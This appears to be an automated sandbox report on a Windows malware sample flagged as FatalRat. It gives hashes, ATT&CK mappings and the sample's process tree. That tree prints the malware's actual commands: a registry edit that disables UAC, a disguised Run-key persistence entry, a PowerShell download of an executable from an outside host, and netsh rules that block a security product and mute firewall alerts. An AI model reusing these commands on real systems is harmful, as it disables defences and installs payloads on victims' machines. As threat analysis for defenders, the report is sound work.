Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
23/02/2025, 12:41
Static task
static1
Behavioral task
behavioral1
Sample
2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
Resource
win10v2004-20250217-en
General
-
Target
2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
-
Size
20.0MB
-
MD5
f999f60afb55137a3c068a707a421a5f
-
SHA1
15f5a8d7930cef9479caf9ecc2dd2c2d8f1efb32
-
SHA256
b17337db64b6ab60e969cec89c36058baf5e100c25684bda9beb0afa1c342b4d
-
SHA512
24a7ffcec017937eec514a2bf2d1d36632abb829ece9fe59c63decb4c07e52f3a0ae8d09c8e7f61fa0f7fa1ecef5fdae8702ab48a09266391969fb71b85fbe4c
-
SSDEEP
196608:patpgF2oM7Vk96Cy8xEqn0SweKG8UvMGnsOTMk:otpgF2oM7Vk96Cy8xEqn0MlDvtnsO4
Malware Config
Extracted
https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe
Signatures
-
Fatalrat family
-
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Fatal Rat payload 1 IoCs
resource yara_rule behavioral1/memory/2384-96-0x0000000000160000-0x0000000000189000-memory.dmp fatalrat -
Blocklisted process makes network request 2 IoCs
flow pid Process 17 1688 powershell.exe 18 1688 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 17 1688 powershell.exe -
Modifies Windows Firewall 2 TTPs 8 IoCs
pid Process 892 netsh.exe 1208 netsh.exe 1840 netsh.exe 1564 netsh.exe 2172 netsh.exe 2204 netsh.exe 1292 netsh.exe 444 netsh.exe -
Executes dropped EXE 1 IoCs
pid Process 2384 Agghosts.exe -
Loads dropped DLL 1 IoCs
pid Process 2384 Agghosts.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\GoogleUpdata_Service = "C:\\programdata\\lnk\\dick.lnk" reg.exe -
pid Process 1688 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Agghosts.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Agghosts.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Agghosts.exe -
Suspicious behavior: EnumeratesProcesses 59 IoCs
pid Process 2736 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 2736 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 2736 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 2736 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 2736 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 2736 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 2736 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 1688 powershell.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe 2384 Agghosts.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2384 Agghosts.exe Token: SeDebugPrivilege 1688 powershell.exe -
Suspicious use of WriteProcessMemory 49 IoCs
description pid Process procid_target PID 2736 wrote to memory of 2000 2736 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 32 PID 2736 wrote to memory of 2000 2736 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 32 PID 2736 wrote to memory of 2000 2736 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 32 PID 2736 wrote to memory of 2384 2736 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 34 PID 2736 wrote to memory of 2384 2736 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 34 PID 2736 wrote to memory of 2384 2736 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 34 PID 2736 wrote to memory of 2384 2736 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 34 PID 2000 wrote to memory of 600 2000 cmd.exe 35 PID 2000 wrote to memory of 600 2000 cmd.exe 35 PID 2000 wrote to memory of 600 2000 cmd.exe 35 PID 2736 wrote to memory of 276 2736 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 36 PID 2736 wrote to memory of 276 2736 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 36 PID 2736 wrote to memory of 276 2736 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 36 PID 2736 wrote to memory of 2008 2736 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 38 PID 2736 wrote to memory of 2008 2736 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 38 PID 2736 wrote to memory of 2008 2736 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 38 PID 2736 wrote to memory of 2764 2736 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 39 PID 2736 wrote to memory of 2764 2736 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 39 PID 2736 wrote to memory of 2764 2736 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 39 PID 2764 wrote to memory of 1564 2764 cmd.exe 42 PID 2764 wrote to memory of 1564 2764 cmd.exe 42 PID 2764 wrote to memory of 1564 2764 cmd.exe 42 PID 2008 wrote to memory of 236 2008 cmd.exe 43 PID 2008 wrote to memory of 236 2008 cmd.exe 43 PID 2008 wrote to memory of 236 2008 cmd.exe 43 PID 2008 wrote to memory of 1688 2008 cmd.exe 44 PID 2008 wrote to memory of 1688 2008 cmd.exe 44 PID 2008 wrote to memory of 1688 2008 cmd.exe 44 PID 2764 wrote to memory of 2172 2764 cmd.exe 45 PID 2764 wrote to memory of 2172 2764 cmd.exe 45 PID 2764 wrote to memory of 2172 2764 cmd.exe 45 PID 2764 wrote to memory of 2204 2764 cmd.exe 46 PID 2764 wrote to memory of 2204 2764 cmd.exe 46 PID 2764 wrote to memory of 2204 2764 cmd.exe 46 PID 2764 wrote to memory of 1292 2764 cmd.exe 47 PID 2764 wrote to memory of 1292 2764 cmd.exe 47 PID 2764 wrote to memory of 1292 2764 cmd.exe 47 PID 2764 wrote to memory of 444 2764 cmd.exe 48 PID 2764 wrote to memory of 444 2764 cmd.exe 48 PID 2764 wrote to memory of 444 2764 cmd.exe 48 PID 2764 wrote to memory of 892 2764 cmd.exe 49 PID 2764 wrote to memory of 892 2764 cmd.exe 49 PID 2764 wrote to memory of 892 2764 cmd.exe 49 PID 2764 wrote to memory of 1208 2764 cmd.exe 50 PID 2764 wrote to memory of 1208 2764 cmd.exe 50 PID 2764 wrote to memory of 1208 2764 cmd.exe 50 PID 2764 wrote to memory of 1840 2764 cmd.exe 51 PID 2764 wrote to memory of 1840 2764 cmd.exe 51 PID 2764 wrote to memory of 1840 2764 cmd.exe 51
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Public\Downloads\20250223024200\1.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
PID:600
-
-
-
C:\programdata\20250223024200\Agghosts.exe"C:\programdata\20250223024200\Agghosts.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f2⤵
- Adds Run key to start application
PID:276
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Public\Videos\download_and_run.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe', 'C:\Users\Public\Videos\bin.exe')"3⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Public\Downloads\20250223024200\fhq.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1564
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2172
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="safemon\360tray.exe=360Safe.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2204
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="safemon\360tray.exe=360Safe.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1292
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state on3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:444
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile settings inboundusernotification disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:892
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile settings inboundusernotification disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1208
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile settings inboundusernotification disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1840
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.7MB
MD52a24dcd41bc3c5b5f7eceda525786578
SHA17e898f9ee5a97a1a261326f0168e8de44dcf8af4
SHA256169e9e4b23878035551455f4e5dbd01ece204e59fe75361680e8786998059ca7
SHA512aaded4c72d3fa77eefd9d4b098288dd6923bd79813466d93313d6acb00fea9bb90248fff92cc89a625c60ae3b7cc1c27e8bb178fdac624ec896267da57b9fd6a
-
Filesize
1KB
MD533d26e34abac9364def07a7bc4c53043
SHA1a2132a28c45de1a5410ea034fb841a962221c669
SHA25661419b248afc224acea8715cc94010539d847de72c1a2014a8312eb036115aa2
SHA5127fd13729ba06fba1febdefb24b3e2ad97681b897e68be0ccfebb9992f89a7a15734a355502e89687ea33fc4bf15648074942e21a43b8ed3acdf162159287bac6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5aea5c63f53c52acaf4ba4b9596cc834e
SHA1e3fc687954187fbc81bad8ee865ee9b39df8e1c7
SHA25628c518fd853b0a5e5d6f387fc63e1936c69a6029163a2f765ee71c4cace53ab0
SHA512d3d6526182333f721a7efbcedcc8ff4bfa3d61b3f843d49b71cd74532b8fd3fe4751a8413be338ca07cc74a8059963401a26265df9546952f4f19f82ab448844
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
229B
MD5fa42ebb1071abc0e618c296ea2cf71a6
SHA19e0c0737b0e37b3e821d011eecd9b0c7c9f2a15a
SHA256395f835731d25803a791db984062dd5cfdcade6f95cc5d0f68d359af32f6258d
SHA5120ed9919675c224201996caeeecf625a1db00a70af5d3ba135dc3d6fa16bfcc562426c813e21b4e861f04d312635be3528d79b5c49b23e78161f2b051fa9aaf05
-
Filesize
1KB
MD53a7cb580bd340505f6dc5b4c829a3eca
SHA121cc730517d74fa1d13316d7e0d817f3bd710906
SHA2561c1528b546aa29be6614707cbe408cb4b46e8ed05bf3fe6b388b9f22a4ee37e2
SHA512c224fa676542b90f8fc990e574028af664dced61612855290fb23ce4acad2d6b9043e901365939106b591b6746b3e4ddada15eede88a947051e9d8083194e630
-
Filesize
415B
MD5a90ccfd040d774b547f7d258b8e03661
SHA1c46e353d34723f9393482974a516d51dfb52440d
SHA256d852cfc4107e9ce5bec7349ef180366bbb4fe0878e725325a2b844f93a1ac1e2
SHA512bdc816781c44b6e9bbc8207a3c0466a45397cf7815f267add21abe243bf138b5bae7ffec867433bf249e139b726413f68b7002f541c89ae1a25bd1e6980abfd7
-
Filesize
192KB
MD52fd94f6e1d71454d716a126f0d7450ac
SHA15d966df95c741880089e9078af921a22216516ec
SHA256a599cbb05b69328655a7a0afc2644ed607c30a05edfb8fd6be2ea920c25b54b5
SHA512340107b69fc49b8fe1acf37a3a6e40c4b7206cf3ae069fea6f4ba702a733401e1feef55e1d858b3529764bcd0ba371ef552f5838444b65b62545e1da150f9bb2
-
Filesize
1.9MB
MD5b7f8c3416cdfd6f46c790da064f66099
SHA1d7ae9a3d49bbf1981e7d6604128e18b6cd160bd6
SHA256b9edf03447cf402e24da384c146c9d1536871a47518c795c4aea6550e3abd94d
SHA51224272954e57f4f4f81dad90469e84946549e3441ba599f8b819d069b803687b3da35f449c0f18755352dba208d6d63af1d6b53c0a56adbd36540b1537bb99dc7